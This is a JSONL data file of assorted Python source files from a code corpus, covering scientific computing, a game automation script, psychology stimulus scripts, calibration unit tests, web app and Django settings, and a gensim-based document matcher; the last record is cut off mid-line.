+{"seq_id":"94215727","text":"import numpy as np\n\nfrom ._spatial_knn import spatial_knn\nfrom .filtering import filter_genes\n\n\ndef select_slide(adata, s, batch_key=\"sample\"):\n r\"\"\"This function selects the data for one slide from the spatial anndata object.\n\n :param adata: Anndata object with multiple spatial experiments\n :param s: name of selected experiment\n :param batch_key: column in adata.obs listing experiment name for each location\n \"\"\"\n\n slide = adata[adata.obs[batch_key].isin([s]), :].copy()\n s_keys = list(slide.uns[\"spatial\"].keys())\n s_spatial = np.array(s_keys)[[s in k for k in s_keys]][0]\n\n slide.uns[\"spatial\"] = {s_spatial: slide.uns[\"spatial\"][s_spatial]}\n\n return slide\n\n\n__all__ = [\n \"select_slide\",\n \"filter_genes\",\n \"spatial_knn\",\n]\n","sub_path":"cell2location/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"214869004","text":"# DESCRIPTION: core module for computing normal modes for WEBnma v3\n# AUTHOR: dandan.xue@uib.no\n# DATE: Feb, 2019\nfrom __future__ import absolute_import\nfrom os.path import join, basename\n\nimport numpy as np\nfrom scipy.linalg import eigh\nfrom scipy.sparse.linalg import eigsh \nfrom scipy.spatial.distance import cdist\n\nfrom utils.pdb import read_pdb\nfrom utils.residue_mass import RES_MASS\nfrom utils.modefiles import write_modefile\nfrom config import MODE_NM\n\n\n# Note for diagonalization:\n# eigh: \n# Solve an ordinary or generalized eigenvalue problem for a complex\n# Hermitian or real symmetric matrix.(use LAPACK?)\n# https://docs.scipy.org/doc/scipy/reference/generated/scipy.linalg.eigh.html\n#\n# eigsh:\n# Find k eigenvalues and eigenvectors of the real symmetric square\n# matrix or complex hermitian matrix A.(use ARPACK)\n# https://docs.scipy.org/doc/scipy/reference/generated/scipy.sparse.linalg.eigsh.html\n\n\n# for konrad's model\nCONST_A = 8.6e5\nCONST_B = 2.39e5\nCONST_C = 1.28e2\nCONST_D = 0.4 # = 4 angstrom\n\n\ndef konrad_force_cons(diss):\n n = diss.shape[0] \n ks = np.zeros(diss.shape)\n for i in range(n):\n for j in range(i):\n r = diss[i,j]\n if r < CONST_D: \n ks[i,j] = CONST_A * r - CONST_B\n else:\n ks[i,j] = CONST_C * r**(-6)\n ks[j,i] = ks[i,j]\n return ks\n\n\ndef Hij(i,j,d,k):\n r_0 = j - i\n r_0 = r_0.reshape((1,3))\n hij = - k/(d**2) * (r_0 * r_0.transpose())\n return hij\n\n \ndef build_H(CAs, ks, diss, mass):\n n = CAs.shape[0]\n h = np.zeros((n,n,3,3))\n H = np.zeros((3*n, 3*n))\n\n for i in range(n):\n for j in range(i):\n h[i,j] = h[j,i] = Hij(CAs[i], CAs[j],diss[i,j], ks[i,j])\n\n H[i*3: i*3+3, j*3: j*3+3] = h[i,j] \n H[j*3: j*3+3, i*3: i*3+3] = h[i,j]\n \n for i in range(n):\n h[i,i] = - sum([h[i,j] for j in range(n) if j !=i ])\n H[i*3: i*3+3, i*3: i*3+3] = h[i,i]\n \n for i in range(n):\n for j in range(n):\n H[i*3: i*3+3, j*3 : j*3+3] = \\\n H[i*3: i*3+3, j*3 : j*3+3] / mass[i] / mass[j]\n \n return H \n\n\ndef calc_modes(CAs, mass, n=MODE_NM):\n diss = cdist(CAs, CAs) # distance matrix of all C-Alpha atoms \n ks = konrad_force_cons(diss)\n h = build_H(CAs, ks, diss, mass) # build Hessian matrix\n\n n = min(n, 3*len(CAs)-6)\n if n > 20:\n e, v = eigh(h)\n return e[:n+6],v[:,:n+6]\n else:\n return eigsh(h,k=n+6,which='SA')\n\n\ndef main(pdbfile, tar_dir='.', filename='modes.txt', mode_num=MODE_NM):\n PDB_ntuple = read_pdb(pdbfile, unit_nm=True)\n CAs = PDB_ntuple.ca_coords\n e,v = calc_modes(CAs, PDB_ntuple.weight, mode_num)\n\n modefile = join(tar_dir, filename)\n write_modefile(e,v,modefile, PDB_ntuple.residues_full)\n\n return modefile\n\n\nif __name__ == '__main__':\n import sys\n main(sys.argv[1], sys.argv[2], sys.argv[1][:-4]+'_modes_v3.txt', sys.argv[3])\n \n","sub_path":"calc_nm.py","file_name":"calc_nm.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"421813531","text":"from mudwyrm_users.admin.achaea import ScriptState, ScriptError\nfrom mudwyrm_users.admin.achaea.trigger import Trigger, Alias, OnEvent\nfrom mudwyrm_users.admin.achaea.action import Action, Outcome\nfrom mudwyrm_users.admin.achaea.database import Base\n\nfrom mudwyrm_users.admin.achaea.scripts import char\nfrom mudwyrm_users.admin.achaea.scripts.actions import all_actions as actions\n\nimport sqlalchemy as sa\n\np = None\ns = ScriptState()\n\ndef init(processor):\n assert processor is not None\n global p\n p = processor\n \n s.plants_here = []\n s.harvesting = False\n \ndef harvest_echo(text):\n p.echo(\"[Harvesting] %s\" % text)\n \n \n# TODO: achaea.known_plants \n\nclass HarvestRule(Base):\n __tablename__ = 'harvest_rules'\n id = sa.Column(sa.Integer, primary_key=True)\n plant = sa.Column(sa.String, nullable=False, unique=True)\n minimal_amount = sa.Column(sa.String, nullable=False, default='sparse')\n \n def __init__(self, plant, minimal_amount):\n self.plant = plant\n self.minimal_amount = minimal_amount\n\n@Alias(r'^harvest_list$')\ndef harvest_list(match):\n rules = p.db.query(HarvestRule).all()\n if not rules:\n p.echo(\"Harvest list is empty.\")\n else:\n p.echo(\"Harvest list: %s.\" % \", \".join(\"%s (%s)\" % (r.plant, r.minimal_amount) for r in rules))\n \n@Alias(r'^harvest_add (\\w+)$',\n r'^harvest_add (\\w+) (\\w+)$')\ndef harvest_add(match):\n plant = match.group(1).lower()\n minimal_amount = match.group(2).lower() if len(match.groups()) > 1 else 'sparse'\n rule = p.db.query(HarvestRule).filter(HarvestRule.plant == plant).first()\n if not rule:\n rule = HarvestRule(plant, minimal_amount)\n p.db.add(rule)\n p.db.commit()\n else:\n rule.minimal_amount = minimal_amount\n p.db.commit()\n p.echo(\"%s has been added to the harvest list and will be harvested if \"\n \"its amount is greater than or equal to %s.\" % (rule.plant.capitalize(), rule.minimal_amount))\n\n@Alias(r'^harvest_remove (\\w+)$')\ndef harvest_remove(match):\n plant = match.group(1).lower()\n rule = p.db.query(HarvestRule).filter(HarvestRule.plant == plant).first()\n if not rule:\n return p.echo(\"Harvest list doesn't contain %s.\" % plant)\n p.db.delete(rule)\n p.db.commit()\n p.echo(\"%s has been removed from the harvest list.\" % rule.plant.capitalize())\n \n \n@Alias(r'^harvest_start$')\ndef harvest_start(match):\n if s.harvesting:\n return harvest_echo(\"Already harvesting.\")\n if not actions.plant_list.possible():\n return harvest_echo(\"Not ready to harvest yet.\")\n s.harvesting = True\n s.plant_list_updated = False\n harvest_echo(\"Harvesting...\")\n p.act(actions.plant_list)\n \n@Alias(r'^harvest_stop$')\ndef harvest_stop(match):\n s.harvesting = False\n harvest_echo(\"Stopped harvesting.\")\n \nplant_name_translations = {\n \"irid moss\": 'moss',\n \"black cohosh\": 'cohosh',\n \"prickly ash tree\": 'ash',\n \"red elm\": 'elm',\n \"wild ginger\": 'ginger',\n \"lady's slipper\": 'slipper',\n \"cactus weed\": 'weed',\n \"myrrh bush\": 'myrrh',\n \"kuzu vine\": 'kuzu',\n \"kola tree\": 'kola'\n}\n\nplant_amounts = ['sparse', 'moderate', 'plentiful', 'abundant']\n\ngatherables = ['olive', 'nuts', 'lumic', 'fruit', 'vegetable',\n 'sugarcane', 'grain']\n\ndef compare_amounts(a, b):\n return cmp(plant_amounts.index(a), plant_amounts.index(b))\n \ndef harvest_step():\n if not s.harvesting or not s.plant_list_updated or not actions.harvest.possible():\n return\n while s.plants_here:\n plant = s.plants_here.pop(0)\n if plant['short_name'] in plant_name_translations:\n plant['short_name'] = plant_name_translations[plant['short_name']]\n rule = p.db.query(HarvestRule).filter(HarvestRule.plant == plant['short_name']).first()\n if rule and compare_amounts(plant['amount'], rule.minimal_amount) >= 0:\n action = actions.gather if plant['short_name'] in gatherables else actions.harvest\n p.act(action, plant['short_name'])\n break\n if not s.plants_here:\n harvest_stop.callback(None)\n\n@OnEvent('PlantListUpdated')\ndef on_plant_list_updated(plants):\n s.plant_list_updated = True\n s.plants_here = plants\n harvest_step()\n \n@OnEvent('PromptLine')\ndef on_prompt_line():\n harvest_step()\n \n#@OnEvent('BalanceChanged')\n#def on_balance_changed(type, value):\n# harvest_step()\n# \n#@OnEvent('StatusChanged')\n#def on_status_changed(type, value):\n# harvest_step()","sub_path":"mudwyrm_users/admin/achaea/scripts/harvesting.py","file_name":"harvesting.py","file_ext":"py","file_size_in_byte":4539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"51270757","text":"\n\nfrom xai.brain.wordbase.nouns._pride import _PRIDE\n\n#calss header\nclass _PRIDED(_PRIDE, ):\n\tdef __init__(self,): \n\t\t_PRIDE.__init__(self)\n\t\tself.name = \"PRIDED\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"pride\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_prided.py","file_name":"_prided.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"312264653","text":"# -*- coding: utf-8 -*-\n\nimport re\nimport pandas as pd\nimport random\n\n\n\n##\n\ndef drawSet(ID, df):\n if ID != 'dem':\n train = pd.concat([df.sample(5)] * 3)\n test = df.copy()\n elif ID == 'dem':\n # repeat four times and drop one line\n train = pd.concat([df] * 4)[:15]\n # repeat three times and drop two lines\n test = pd.concat([df] * 3)[:10]\n\n return {'train': train, 'test': test}\n\n##\n\n\nlex = pd.read_csv('../stimuli/vocab.csv')\n\nnoms = pd.read_csv('../stimuli/nouns.csv')\nadjs = lex[lex.cat=='adj']\nnums = lex[lex.cat=='num']\n\n# sample 20 nouns..half will be repeated, thus 30 trials\nnoms = noms.sample(20)\nrepeatNoms = noms.sample(10)\nnoms = pd.concat([noms, repeatNoms])\n\nmods = pd.read_csv('../stimuli/modifiers.csv')\n\n\ninnerID, outerID = cond.split('-')\nIDs = [innerID, outerID]\n\ninOutSets = {ID:mods[mods.cat==ID].sample(frac=1).reset_index(drop=True) for ID in IDs}\n\n\n\ninner, outer = [drawSet(ID, inOutSets[ID]) for ID in IDs]\n \n\n\n\n\n\n# sample 5 adjs or nums to repeat 3 times, thus 15 trials\ncondition = True\nif condition:\n adjs = mods[mods.cat=='adj'].sample(5)\n adjs = pd.concat([adjs, adjs, adjs])\nelse:\n nums = mods[mods.cat=='num'].sample(5)\n nums = pd.concat([nums, nums, nums])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nabx = pd.read_csv('stim_list.csv', sep=';')\n\n# v = ['re', 'ru']\n# sh = 'sh'\ncontrastes = [('b', 'p'), ('k', 'g')]\nclabels = ['native', 'emerging']\n\ntrials = []\n\ndef makefour(A, B):\n four = [\n [A, B, A, 'A'],\n [A, B, B, 'B'],\n [B, A, A, 'B'],\n [B, A, B, 'A']\n ]\n return four\n\n\nfor f in abx.frame.unique():\n for n,cont in enumerate(contrastes):\n A = abx[abx.frame==f][abx.phon==cont[0]].iloc[0]['item']\n B = abx[abx.frame==f][abx.phon==cont[1]].iloc[0]['item']\n t1 = makefour(A,B)\n\n # [\n # [A+'_'+v[0], B+'_'+v[1], A+'_'+sh, 'A', cont[0]], # eg b-re p-ru b-sh\n # [A+'_'+v[1], B+'_'+v[0], A+'_'+sh, 'A', cont[0]], # eg b-ru p-re b-sh\n # [A+'_'+v[0], B+'_'+v[1], B+'_'+sh, 'B', cont[1]], # eg b-re p-ru p-sh\n # [A+'_'+v[1], B+'_'+v[0], B+'_'+sh, 'B', cont[1]], # eg b-ru p-re p-sh\n # ]\n\n # A = abx[abx.frame==f][abx.phon==cont[1]].iloc[0]['item']\n # B = abx[abx.frame==f][abx.phon==cont[0]].iloc[0]['item']\n # t2 = makefour(A,B)\n\n # [\n # [A+'_'+v[0], B+'_'+v[1], A+'_'+sh, 'A', cont[1]], # eg p-re b-ru p-sh\n # [A+'_'+v[1], B+'_'+v[0], A+'_'+sh, 'A', cont[1]], # eg p-ru b-re p-sh\n # [A+'_'+v[0], B+'_'+v[1], B+'_'+sh, 'B', cont[0]], # eg p-re b-ru b-sh\n # [A+'_'+v[1], B+'_'+v[0], B+'_'+sh, 'B', cont[0]], # eg p-ru b-re b-sh\n # ]\n\n\n for t in (t1):\n trials.append(t+[clabels[n]]+[f]+['test'])\n\ntrials = pd.DataFrame(trials)\n\nheader = [\n 'A',\n 'B',\n 'X',\n 'bonne_rep',\n # 'cible',\n 'contraste',\n 'frame',\n 'bloc'\n]\n\ntrials.columns = header\n\ntrials.to_csv('trials.csv', index=None) ","sub_path":"POS/English/scripts/contrebalancement.py","file_name":"contrebalancement.py","file_ext":"py","file_size_in_byte":3032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"561417166","text":"import Polish\nimport check\nimport truthtable\nimport paradigm\n\n\ndef main():\n polish1 = Polish.Polish()\n polish2 = Polish.Polish()\n\n a = input('请输入表达式:')\n print(a)\n if check.check(a):\n print('波兰式:' + polish1.get_Polish(a))\n print('逆波兰式:' + polish2.get_R_Polish(a))\n truthtable1 = truthtable.TruthTable(polish2.get_R_Polish(a))\n myparadigm = paradigm.paradigm(a)\n print('主合取范式:' + myparadigm.get_H_paradigm())\n print('主析取范式:' + myparadigm.get_X_paradigm())\n print('真值表')\n print(truthtable1.get_truthtable())\n else:\n print('输入的表达式有误')\n\n\nmain()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"119868830","text":"\"\"\" Unit tests for calibration solution\n\n\n\"\"\"\nimport logging\nimport unittest\n\nimport astropy.units as u\nimport numpy\nfrom astropy.coordinates import SkyCoord\n\nfrom data_models.memory_data_models import Skycomponent\nfrom data_models.polarisation import PolarisationFrame\nfrom processing_components.calibration.calibration import solve_gaintable\nfrom processing_components.calibration.operations import apply_gaintable, create_gaintable_from_blockvisibility, \\\n gaintable_summary, qa_gaintable\nfrom processing_components.imaging.base import predict_skycomponent_visibility\nfrom processing_components.simulation.testing_support import simulate_gaintable\nfrom processing_components.simulation.configurations import create_named_configuration\nfrom processing_components.visibility.base import copy_visibility, create_blockvisibility\nfrom processing_components.visibility.operations import divide_visibility\n\nlog = logging.getLogger(__name__)\n\n\nclass TestCalibrationSolvers(unittest.TestCase):\n def setUp(self):\n numpy.random.seed(180555)\n \n def actualSetup(self, sky_pol_frame='stokesIQUV', data_pol_frame='linear', f=None, vnchan=3, ntimes=3):\n self.lowcore = create_named_configuration('LOWBD2', rmax=300.0)\n self.times = (numpy.pi / 43200.0) * numpy.linspace(0.0, 30.0, ntimes)\n self.frequency = numpy.linspace(1.0e8, 1.1e8, vnchan)\n self.channel_bandwidth = numpy.array(vnchan * [self.frequency[1] - self.frequency[0]])\n \n if f is None:\n f = [100.0, 50.0, -10.0, 40.0]\n \n if sky_pol_frame == 'stokesI':\n f = [100.0]\n \n self.flux = numpy.outer(numpy.array([numpy.power(freq / 1e8, -0.7) for freq in self.frequency]), f)\n \n # The phase centre is absolute and the component is specified relative (for now).\n # This means that the component should end up at the position phasecentre+compredirection\n self.phasecentre = SkyCoord(ra=+180.0 * u.deg, dec=-35.0 * u.deg, frame='icrs', equinox='J2000')\n self.compabsdirection = SkyCoord(ra=+181.0 * u.deg, dec=-35.0 * u.deg, frame='icrs', equinox='J2000')\n self.comp = Skycomponent(direction=self.compabsdirection, frequency=self.frequency, flux=self.flux,\n polarisation_frame=PolarisationFrame(sky_pol_frame))\n self.vis = create_blockvisibility(self.lowcore, self.times, self.frequency, phasecentre=self.phasecentre,\n channel_bandwidth=self.channel_bandwidth, weight=1.0,\n polarisation_frame=PolarisationFrame(data_pol_frame))\n self.vis = predict_skycomponent_visibility(self.vis, self.comp)\n \n def test_solve_gaintable_scalar(self):\n self.actualSetup('stokesI', 'stokesI', f=[100.0])\n gt = create_gaintable_from_blockvisibility(self.vis)\n log.info(\"Created gain table: %s\" % (gaintable_summary(gt)))\n gt = simulate_gaintable(gt, phase_error=10.0, amplitude_error=0.0)\n original = copy_visibility(self.vis)\n self.vis = apply_gaintable(self.vis, gt)\n gtsol = solve_gaintable(self.vis, original, phase_only=True, niter=200)\n residual = numpy.max(gtsol.residual)\n assert residual < 3e-8, \"Max residual = %s\" % (residual)\n assert numpy.max(numpy.abs(gtsol.gain - 1.0)) > 0.1\n \n def test_solve_gaintable_scalar_normalise(self):\n self.actualSetup('stokesI', 'stokesI', f=[100.0])\n gt = create_gaintable_from_blockvisibility(self.vis)\n log.info(\"Created gain table: %s\" % (gaintable_summary(gt)))\n gt = simulate_gaintable(gt, phase_error=0.0, amplitude_error=0.1)\n gt.data['gain'] *= 2.0\n original = copy_visibility(self.vis)\n self.vis = apply_gaintable(self.vis, gt)\n gtsol = solve_gaintable(self.vis, original, phase_only=False, niter=200, normalise_gains=True)\n residual = numpy.max(gtsol.residual)\n assert residual < 3e-8, \"Max residual = %s\" % (residual)\n assert numpy.max(numpy.abs(gtsol.gain - 1.0)) > 0.1\n \n def test_solve_gaintable_scalar_bandpass(self):\n self.actualSetup('stokesI', 'stokesI', f=[100.0], vnchan=128)\n gt = create_gaintable_from_blockvisibility(self.vis)\n log.info(\"Created gain table: %s\" % (gaintable_summary(gt)))\n gt = simulate_gaintable(gt, phase_error=10.0, amplitude_error=0.01, smooth_channels=8)\n original = copy_visibility(self.vis)\n self.vis = apply_gaintable(self.vis, gt)\n gtsol = solve_gaintable(self.vis, original, phase_only=False, niter=200, damping=0.5)\n residual = numpy.max(gtsol.residual)\n assert residual < 3e-8, \"Max residual = %s\" % (residual)\n assert numpy.max(numpy.abs(gtsol.gain - 1.0)) > 0.1\n \n def test_solve_gaintable_scalar_pointsource(self):\n self.actualSetup('stokesI', 'stokesI', f=[100.0])\n gt = create_gaintable_from_blockvisibility(self.vis)\n log.info(\"Created gain table: %s\" % (gaintable_summary(gt)))\n gt = simulate_gaintable(gt, phase_error=10.0, amplitude_error=0.0)\n original = copy_visibility(self.vis)\n self.vis = apply_gaintable(self.vis, gt)\n point_vis = divide_visibility(self.vis, original)\n gtsol = solve_gaintable(point_vis, phase_only=True, niter=200)\n residual = numpy.max(gtsol.residual)\n assert residual < 3e-8, \"Max residual = %s\" % (residual)\n assert numpy.max(numpy.abs(gtsol.gain - 1.0)) > 0.1\n \n def core_solve(self, spf, dpf, phase_error=0.1, amplitude_error=0.0, leakage=0.0,\n phase_only=True, niter=200, crosspol=False, residual_tol=1e-6, f=None, vnchan=3):\n if f is None:\n f = [100.0, 50.0, -10.0, 40.0]\n self.actualSetup(spf, dpf, f=f, vnchan=vnchan)\n gt = create_gaintable_from_blockvisibility(self.vis)\n log.info(\"Created gain table: %s\" % (gaintable_summary(gt)))\n gt = simulate_gaintable(gt, phase_error=phase_error, amplitude_error=amplitude_error, leakage=leakage)\n original = copy_visibility(self.vis)\n vis = apply_gaintable(self.vis, gt)\n gtsol = solve_gaintable(self.vis, original, phase_only=phase_only, niter=niter, crosspol=crosspol, tol=1e-6)\n vis = apply_gaintable(vis, gtsol, inverse=True)\n residual = numpy.max(gtsol.residual)\n assert residual < residual_tol, \"%s %s Max residual = %s\" % (spf, dpf, residual)\n log.debug(qa_gaintable(gt))\n assert numpy.max(numpy.abs(gtsol.gain - 1.0)) > 0.1\n \n def test_solve_gaintable_vector_phase_only_linear(self):\n self.core_solve('stokesIQUV', 'linear', phase_error=0.1, phase_only=True,\n f=[100.0, 50.0, 0.0, 0.0])\n \n def test_solve_gaintable_vector_phase_only_circular(self):\n self.core_solve('stokesIQUV', 'circular', phase_error=0.1, phase_only=True,\n f=[100.0, 0.0, 0.0, 50.0])\n \n def test_solve_gaintable_vector_large_phase_only_linear(self):\n self.core_solve('stokesIQUV', 'linear', phase_error=10.0, phase_only=True,\n f=[100.0, 50.0, 0.0, 0.0])\n \n def test_solve_gaintable_vector_large_phase_only_circular(self):\n self.core_solve('stokesIQUV', 'circular', phase_error=10.0,\n phase_only=True, f=[100.0, 0.0, 0.0, 50.0])\n \n def test_solve_gaintable_vector_both_linear(self):\n self.core_solve('stokesIQUV', 'linear', phase_error=0.1, amplitude_error=0.01,\n phase_only=False, f=[100.0, 50.0, 0.0, 0.0])\n \n def test_solve_gaintable_vector_both_circular(self):\n self.core_solve('stokesIQUV', 'circular', phase_error=0.1, amplitude_error=0.01,\n phase_only=False, f=[100.0, 0.0, 0.0, 50.0])\n \n def test_solve_gaintable_matrix_both_linear(self):\n self.core_solve('stokesIQUV', 'linear', phase_error=0.1, amplitude_error=0.01,\n leakage=0.01, residual_tol=1e-3, crosspol=True,\n phase_only=False, f=[100.0, 50.0, 0.0, 0.0])\n \n def test_solve_gaintable_matrix_both_circular(self):\n self.core_solve('stokesIQUV', 'circular', phase_error=0.1, amplitude_error=0.01,\n leakage=0.01, residual_tol=1e-3, crosspol=True,\n phase_only=False, f=[100.0, 0.0, 0.0, 50.0])\n \n def test_solve_gaintable_matrix_both_circular_channel(self):\n self.core_solve('stokesIQUV', 'circular', phase_error=0.1, amplitude_error=0.01,\n leakage=0.01, residual_tol=1e-3, crosspol=True, vnchan=4,\n phase_only=False, f=[100.0, 0.0, 0.0, 50.0])\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/processing_components/test_calibration_solvers.py","file_name":"test_calibration_solvers.py","file_ext":"py","file_size_in_byte":8750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"626563561","text":"\"\"\"\n Entry Point\n\"\"\"\n\nfrom board_app import app, init_db, insert_sample\nfrom argparse import ArgumentParser\n\ndef get_options():\n ap = ArgumentParser()\n ap.add_argument('-i', '--init-db', action='store_true', help='initialize DB before running.')\n ap.add_argument('-s', '--insert-sample', action='store_true', help='insert samples before running.')\n ap.add_argument('-n', '--no-run', action='store_true', help='exit this application without app.run()')\n return ap.parse_args()\n\nif __name__ == '__main__':\n args = get_options()\n if args.init_db:\n init_db()\n if args.insert_sample:\n insert_sample()\n if args.no_run:\n exit(0)\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"504225841","text":"\"\"\"\nDjango settings for mapping project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.6/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.6/ref/settings/\n\"\"\"\n\nfrom django.core.exceptions import ImproperlyConfigured\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\nmsg = 'Set the %s environment variable'\n\n\ndef get_env_var(var_name):\n \"\"\"\n Rather than raising a key error we can give a more informative message\n \"\"\"\n try:\n return os.environ[var_name]\n except KeyError:\n error_msg = msg % var_name\n raise ImproperlyConfigured(error_msg)\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'r%o^yd4mfi*9ulqhdpw)*f53%mvy=)i3^g%fdukvfob1=e6q=^'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.gis',\n 'accounts',\n 'location',\n 'south',\n 'rest_framework',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'mapping.urls'\n\nWSGI_APPLICATION = 'mapping.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.6/ref/settings/#databases\n\n########## DATABASE CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases\n# DB_USER = get_env_var('DB_USER')\n# DB_PASSWORD = get_env_var('DB_PASSWORD')\n# DB_HOST = get_env_var('DB_HOST')\n# DB_NAME = get_env_var('DB_NAME')\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.contrib.gis.db.backends.postgis',\n 'NAME': 'gistest',\n 'USER': 'brent',\n 'PASSWORD': 'weasel',\n 'HOST': 'localhost',\n 'PORT': '',\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.6/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.6/howto/static-files/\n\nSTATIC_URL = '/static/'\nAUTH_USER_MODEL = 'accounts.ZUser'\n\nREST_FRAMEWORK = {\n 'DEFAULT_PERMISSION_CLASSES': ('rest_framework.permissions.IsAdminUser',),\n 'PAGINATE_BY': 10\n}\n","sub_path":"mapping/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"289591303","text":"from flask import Flask\nimport mysql.connector\nimport json\n\napp = Flask(__name__)\n\n\ndef students():\n config = {\n 'user': 'root',\n 'password': 'root',\n 'host': 'db',\n 'port': '3306',\n 'database': 'my_database'\n }\n connection = mysql.connector.connect(**config)\n cursor = connection.cursor()\n cursor.execute('SELECT * FROM students')\n results = [(name, surname, speciality_name) for (name, surname, speciality_name) in cursor]\n cursor.close()\n connection.close()\n return results\n\n\n@app.route('/')\ndef index():\n return json.dumps({'students': students()})\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n","sub_path":"homework_completed/HW#5 Docker/docker_advanced_app/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"218785340","text":"from promises.models import Promise\nfrom promises.nlp import title2nouns, stopwords, pos_tagger_for_model\n\nfrom gensim.models.doc2vec import TaggedDocument\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom gensim import corpora, models, similarities\nimport logging\nfrom itertools import tee\n\nlogger = logging.getLogger('xproject')\n\nclass QuerysetDocIterator(object):\n \"\"\"\n Iterator that turns a queryset into documents suitable for gensim.\n transform should be a callable than turns a model object into a tuple of (text, labels)\n \"\"\"\n def __init__(self, queryset, transform=None):\n self.queryset = queryset\n if not transform:\n self.transform = lambda obj: (str(obj), [obj.pk])\n else:\n self.transform = transform\n\n def __iter__(self):\n \"Iterator over queryset, retrieves data in chunks\"\n chunk_size = 500\n queryset = self.queryset\n try:\n last_pk = queryset.order_by('-pk')[:1].get()['pk']\n except ObjectDoesNotExist:\n return\n \n pk = 0\n queryset = queryset.order_by('pk')\n idx = -1\n while pk < last_pk:\n for row in queryset.filter(pk__gt=pk)[:chunk_size]:\n idx += 1\n pk = row['pk']\n doc = self.transform(row)\n yield TaggedDocument(words=doc[0], tags=[idx, pk])\n\n\nclass DocumentMatcher(object):\n lsi = None\n\n def __init__(self, queryset, document_transform=None):\n self.queryset = queryset\n self.document_transform = document_transform\n\n def get_queryset(self):\n return self.queryset\n\n def get_document_iterator(self, queryset):\n return QuerysetDocIterator(queryset, transform=self.document_transform)\n\n def build_model(self):\n logger.debug('Matcher - Retrieving documents...')\n queryset = self.get_queryset()\n documents = list(self.get_document_iterator(queryset))\n \n dictionary_ko = corpora.Dictionary.load('/data/ko.dict')\n\n num_topics = 40\n\n logger.debug('Matcher - Building Lsi model...')\n # Generate Lsi model for promise text corpus\n corpus = [dictionary_ko.doc2bow(text.words) for text in documents]\n # Train Lsi model\n self.lsi = models.LsiModel(corpus, id2word=dictionary_ko, num_topics=num_topics)\n # Transform corpus to LSI space and index it\n self.index = similarities.MatrixSimilarity(self.lsi[corpus])\n \n self.dictionary_ko = dictionary_ko\n self.documents = documents\n\n def most_similar(self, text, n=99, threshold=0.6):\n \"\"\"\n Gets the n documents most similar to the text.\n This analyzes the text for nouns, so please use short texts (like titles) only.\n Returns list of (promise_id, score) tuples\n \"\"\"\n if not self.lsi:\n self.build_model()\n\n tagged_text = pos_tagger_for_model(text)\n\n logger.debug('Matcher - Searching for documents similar to %s (%s)' % (text, ' '.join(tagged_text)))\n\n # Convert text to bag of words\n vec_bow = self.dictionary_ko.doc2bow(tagged_text)\n # Convert the query to LSI space\n vec_lsi = self.lsi[vec_bow]\n # Perform a similarity query against the corpus\n sims = [item + (self.documents[item[0]].tags,) for item in enumerate(self.index[vec_lsi])]\n if threshold:\n sims = filter(lambda item: item[1] >= threshold, sims)\n # Return the similarities sorted by descending score\n if not sims:\n logger.debug('Matcher - No matches for %s (n=%d, threshold=%.2f)' % (text, n, threshold))\n return []\n sims = sorted(sims, 